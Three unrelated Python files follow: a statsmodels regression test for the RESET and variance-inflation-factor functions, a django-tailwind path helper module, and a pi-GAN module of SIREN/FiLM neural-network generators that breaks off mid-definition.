import numpy as np from numpy.testing import assert_almost_equal from statsmodels.datasets import statecrime from statsmodels.regression.linear_model import OLS from statsmodels.stats.outliers_influence import ( reset_ramsey, variance_inflation_factor, ) from statsmodels.tools import add_constant def test_reset_stata(): data = statecrime.load_pandas().data mod = OLS(data.violent, add_constant(data[["murder", "hs_grad"]])) res = mod.fit() stat = reset_ramsey(res, degree=4) assert_almost_equal(stat.fvalue[0, 0], 1.52, decimal=2) assert_almost_equal(stat.pvalue, 0.2221, decimal=4) exog_idx = list(data.columns).index("urban") data_arr = np.asarray(data) vif = variance_inflation_factor(data_arr, exog_idx) assert_almost_equal(vif, 16.4394, decimal=4) exog_idx = list(data.columns).index("urban") vif_df = variance_inflation_factor(data, exog_idx) assert_almost_equal(vif_df, 16.4394, decimal=4)
11589910
import json import os from django.apps import apps DJANGO_TAILWIND_APP_DIR = os.path.dirname(__file__) def get_app_path(app_name): app_label = app_name.split(".")[-1] return apps.get_app_config(app_label).path def get_tailwind_src_path(app_name): return os.path.join(get_app_path(app_name), "static_src") def get_package_json_path(app_name): return os.path.join(get_app_path(app_name), "static_src", "package.json") def get_package_json_contents(app_name): with open(get_package_json_path(app_name), "r") as f: return json.load(f) def is_path_absolute(path): return path.startswith("/") or path.startswith("http")
11589914
import sys from numpy.lib.type_check import imag from torch._C import device from torch.functional import align_tensors sys.path.append('/apdcephfs/share_1330077/starksun/projects/pi-GAN') from fid_evaluation import output_images import numpy as np import torch.nn as nn import torch import math import torch.nn.functional as F from .latent_grid import StyleGenerator2D from .layers import * class Sine(nn.Module): """Sine Activation Function.""" def __init__(self): super().__init__() def forward(self, x): return torch.sin(30. * x) def sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / 30, np.sqrt(6 / num_input) / 30) def first_layer_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-1 / num_input, 1 / num_input) def film_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / 30, np.sqrt(6 / num_input) / 30) def first_layer_film_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-1 / num_input, 1 / num_input) def kaiming_leaky_init(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: torch.nn.init.kaiming_normal_(m.weight, a=0.2, mode='fan_in', nonlinearity='leaky_relu') # class CustomMappingNetwork(nn.Module): # def __init__(self, z_dim, map_hidden_dim, map_output_dim): # super().__init__() # self.network = nn.Sequential(nn.Linear(z_dim, map_hidden_dim), # nn.LeakyReLU(0.2, inplace=True), # nn.Linear(map_hidden_dim, map_hidden_dim), # nn.LeakyReLU(0.2, inplace=True), # nn.Linear(map_hidden_dim, map_hidden_dim), # nn.LeakyReLU(0.2, inplace=True), # nn.Linear(map_hidden_dim, map_output_dim)) # self.network.apply(kaiming_leaky_init) # with torch.no_grad(): # self.network[-1].weight *= 0.25 # def forward(self, z): # frequencies_offsets = self.network(z) # frequencies = frequencies_offsets[..., :frequencies_offsets.shape[-1]//2] # phase_shifts = frequencies_offsets[..., frequencies_offsets.shape[-1]//2:] # return frequencies, phase_shifts class CustomMappingNetwork(nn.Module): def __init__(self, z_dim, map_hidden_dim, map_output_dim, n_blocks=3): super().__init__() self.network = [nn.Linear(z_dim, map_hidden_dim), nn.LeakyReLU(0.2, inplace=True)] for _ in range(n_blocks): self.network.append(nn.Linear(map_hidden_dim, map_hidden_dim)) self.network.append(nn.LeakyReLU(0.2, inplace=True)) self.network.append(nn.Linear(map_hidden_dim, map_output_dim)) self.network = nn.Sequential(*self.network) self.network.apply(kaiming_leaky_init) with torch.no_grad(): self.network[-1].weight *= 0.25 def forward(self, z): frequencies_offsets = self.network(z) # z: (n_batch * n_point, n_channel) frequencies = frequencies_offsets[..., :frequencies_offsets.shape[-1]//2] phase_shifts = frequencies_offsets[..., frequencies_offsets.shape[-1]//2:] return frequencies, phase_shifts def frequency_init(freq): def init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / freq, np.sqrt(6 / num_input) / freq) return init class FiLMLayer(nn.Module): def __init__(self, input_dim, hidden_dim): super().__init__() self.layer = nn.Linear(input_dim, hidden_dim) def forward(self, x, freq, phase_shift): x = self.layer(x) if x.shape[1] != freq.shape[1]: freq = freq.unsqueeze(1).expand_as(x) #TODO: all x conditioned on a single freq and phase_shift --> every x conditioned on a specific freq and phase_shift phase_shift = phase_shift.unsqueeze(1).expand_as(x) return torch.sin(freq * x + phase_shift) class TALLSIREN(nn.Module): """Primary SIREN architecture used in pi-GAN generators.""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(input_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3), nn.Sigmoid()) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = self.color_layer_linear(rbg) return torch.cat([rbg, sigma], dim=-1) class UniformBoxWarp(nn.Module): def __init__(self, sidelength): super().__init__() self.scale_factor = 2/sidelength def forward(self, coordinates): return coordinates * self.scale_factor class SPATIALSIRENBASELINE(nn.Module): """Same architecture as TALLSIREN but adds a UniformBoxWarp to map input points to -1, 1""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENBASELINEHD(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use neural renderer""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) # rbg = torch.sigmoid(self.color_layer_linear(rbg)) rbg = self.color_layer_linear(rbg) return torch.cat([rbg, sigma], dim=-1) class UniformBoxWarp(nn.Module): def __init__(self, sidelength): super().__init__() self.scale_factor = 2/sidelength def forward(self, coordinates): return coordinates * self.scale_factor def sample_from_3dgrid(coordinates, grid): """ Expects coordinates in shape (batch_size, num_points_per_batch, 3) Expects grid in shape (1, channels, H, W, D) (Also works if grid has batch size) Returns sampled features of shape (batch_size, num_points_per_batch, feature_channels) """ coordinates = coordinates.float() grid = grid.float() batch_size, n_coords, n_dims = coordinates.shape sampled_features = torch.nn.functional.grid_sample(grid.expand(batch_size, -1, -1, -1, -1), coordinates.reshape(batch_size, 1, 1, -1, n_dims), mode='bilinear', padding_mode='zeros', align_corners=True) N, C, H, W, D = sampled_features.shape sampled_features = sampled_features.permute(0, 4, 3, 2, 1).reshape(N, H*W*D, C) return sampled_features def modified_first_sine_init(m): with torch.no_grad(): # if hasattr(m, 'weight'): if isinstance(m, nn.Linear): num_input = 3 m.weight.uniform_(-1 / num_input, 1 / num_input) class EmbeddingPiGAN128(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details.""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(32 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) print(self.network) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) x = torch.cat([shared_features, input], -1) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class EmbeddingPiGAN256(EmbeddingPiGAN128): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 64, 64, 64)*0.1) class SPATIALSIRENGRID(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use local latent sampled from grid""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.local_coordinates = True self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(32, 256, (len(self.network) + 1)*hidden_dim*2, n_blocks=1) self.grid_latent_network = StyleGenerator2D(out_res=32, out_ch=32, z_dim=z_dim, ch_mul=1, ch_max=256, skip_conn=False) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): latent_grid = self.grid_latent_network(z) input_grid = self.gridwarper(input) # range: (-1.4, 1.4) sampled_latent = self.sample_local_latents(latent_grid, input_grid) frequencies, phase_shifts = self.mapping_network(sampled_latent) if self.local_coordinates: # map global coordinate space into local coordinate space (i.e. each grid cell has a [-1, 1] range) preserve_y = sampled_latent.ndim == 4 # if latents are 2D, then keep the y coordinate global input = self.get_local_coordinates( global_coords=input, local_grid_length=32, preserve_y=False ) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, box_warp=False, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 x = self.gridwarper(input) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) def sample_local_latents(self, local_latents, xyz): B, local_z_dim, H, W = local_latents.shape # take only x and z coordinates, since our latent codes are in a 2D grid (no y dimension) # for the purposes of grid_sample we treat H*W as the H dimension and samples_per_ray as the W dimension xyz = xyz[:, :, [0, 2]].unsqueeze(1) # [B, H * W, samples_per_ray, 2] # all samples get the most detailed latent codes sampled_local_latents = nn.functional.grid_sample( input=local_latents, # (b, c, h, w) grid=xyz, # (b, 1, n_pixel, 2) mode='bilinear', # bilinear mode will use trilinear interpolation if input is 5D align_corners=False, padding_mode="zeros", ) # output is shape [B, local_z_dim, H * W, samples_per_ray] # put channel dimension at end: [B, H * W, samples_per_ray, local_z_dim] sampled_local_latents = sampled_local_latents.permute(0, 2, 3, 1) # merge everything else into batch dim: [B * H * W * samples_per_ray, local_z_dim] sampled_local_latents = sampled_local_latents.reshape(B, -1, local_z_dim) return sampled_local_latents def get_local_coordinates(self, global_coords, local_grid_length, preserve_y=True): local_coords = global_coords.clone() # it is assumed that the global coordinates are scaled to [-1, 1] # convert to [0, 1] scale local_coords = (local_coords + 1) / 2 # scale so that each grid cell in the local_latent grid is 1x1 in size local_coords = local_coords * local_grid_length # subtract integer from each coordinate so that they are all in range [0, 1] local_coords = local_coords - (local_coords - 0.5).round() # return to [-1, 1] scale local_coords = (local_coords * 2) - 1 if preserve_y: # preserve the y dimension in the global coordinate frame, since it doesn't have a local latent code coords = torch.cat([local_coords[..., 0:1], global_coords[..., 1:2], local_coords[..., 2:3]], dim=-1) else: coords = torch.cat([local_coords[..., 0:1], local_coords[..., 1:2], local_coords[..., 2:3]], dim=-1) return coords class SPATIALSIRENVOLUME(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use local latent sampled from volume""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(32, 256, (len(self.network) + 1)*hidden_dim*2) # self.volume_latent_network = VolumeStyleGenerator( # mapping_fmaps=z_dim, # style_mixing_prob=0.9, # Probability of mixing styles during training. None = disable. # truncation_psi=0.7, # Style strength multiplier for the truncation trick. None = disable. # truncation_cutoff=8, # Number of layers for which to apply the truncation trick. None = disable. # resolution=32, # fmap_base=512, # fmap_max=256) self.volume_latent_network = VolumeStyleGenerator(input_nc=z_dim, output_nc=32, n_samples=3, norm='batch', activation='ReLU', padding_type='zero') self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): latent_grid = self.volume_latent_network(z) input_grid = self.gridwarper(input) # interpolate latent # samples = F.grid_sample(latent_grid, # input[..., [0, 2]].unsqueeze(2), # align_corners=True, # mode='bilinear', # padding_mode='zeros') samples = sample_from_3dgrid(input_grid, latent_grid) frequencies, phase_shifts = self.mapping_network(samples) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, box_warp=False, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENSEMANTIC(nn.Module): """Same architecture as TALLSIREN but synthesis semantic map""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_sine = FiLMLayer(hidden_dim, hidden_dim) self.label_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 19)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 2)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.label_layer_sine.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) start += self.hidden_dim end += self.hidden_dim sigma = self.final_layer(x) labels = self.label_layer_sine(x, frequencies[..., start:end], phase_shifts[..., start:end]) # TODO: w. / w.o softmax activation on label labels = self.label_layer_linear(labels) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENBASELINESEMANTIC(nn.Module): """Same architecture as SPATIALSIRENSEMANTIC but doesn't condition on geometry code when regressing labels""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 19)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) # labels = torch.sigmoid(self.label_layer_linear(x)) labels = self.label_layer_linear(x) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENDISENTANGLE(nn.Module): """Same architecture as TALLSIREN but use double latent codes""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: 为什么做变换 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class 